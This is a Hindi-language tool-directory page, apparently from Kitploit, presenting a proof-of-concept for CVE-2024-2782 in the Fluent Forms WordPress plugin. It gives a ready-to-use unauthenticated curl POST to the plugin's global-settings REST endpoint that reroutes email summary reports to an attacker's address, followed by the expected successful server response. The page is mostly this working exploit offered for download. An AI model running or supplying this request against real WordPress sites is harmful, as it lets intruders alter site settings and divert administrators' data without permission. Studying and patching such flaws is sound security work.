Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-2782-PoC — CVE-2024-2782 Proof-of-Concept | Kitploit
उपकरण/GitHubGitHub/whale93/cve-2024-2782-poc
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubwhale93/cve-2024-2782-poc

CVE-2024-2782-PoC

CVE-2024-2782 Proof-of-Concept

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-2782-PoC

CVE-2024-2782 प्रूफ-ऑफ-कॉन्सेप्ट

वर्डप्रेस के लिए क्विज़, सर्वे और ड्रैग एंड ड्रॉप WP फॉर्म बिल्डर प्लगइन के लिए फ्लुएंट फॉर्म्स द्वारा कॉन्टैक्ट फॉर्म प्लगइन, /wp-json/fluentform/v1/global-settings REST API एंडपॉइंट पर क्षमता जांच की कमी के कारण डेटा में अनधिकृत संशोधन की चपेट में है, सभी संस्करणों में 5.1.16 तक और सहित। यह अप्रमाणित हमलावरों के लिए प्लगइन की सभी सेटिंग्स को संशोधित करना संभव बनाता है।

पूर्वापेक्षाएँ

  • वर्डप्रेस साइट जिसमें कॉन्टैक्ट फॉर्म – फ्लुएंट फॉर्म्स ≤ 5.1.16 सक्रिय हो।
  • हमलावर साइट के REST API तक पहुँच सकता है (कोई प्रमाणीकरण आवश्यक नहीं)।

एक्सप्लॉइट कमांड

root@kitploit:~
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/global-settings"
  -H "Content-Type: application/json"
  -d '{
  "key": "emailSummarySettings",
  "email_report": "{"send_to_type":"custom","custom_recipients":"[email protected]"}"
}'

अपेक्षित प्रतिक्रिया

root@kitploit:~
HTTP/1.1 200 OK
Date: Thu, 31 Jul 2025 13:11:49 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.3.11
X-Robots-Tag: noindex
Link: <http://target:9090/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Allow: POST
Content-Length: 4
Content-Type: application/json; charset=UTF-8

true

स्क्रीनशॉट चित्र

वर्डप्रेस डेटाबेस में परिवर्तन सत्यापित करें चित्र

टूल डाउनलोड करें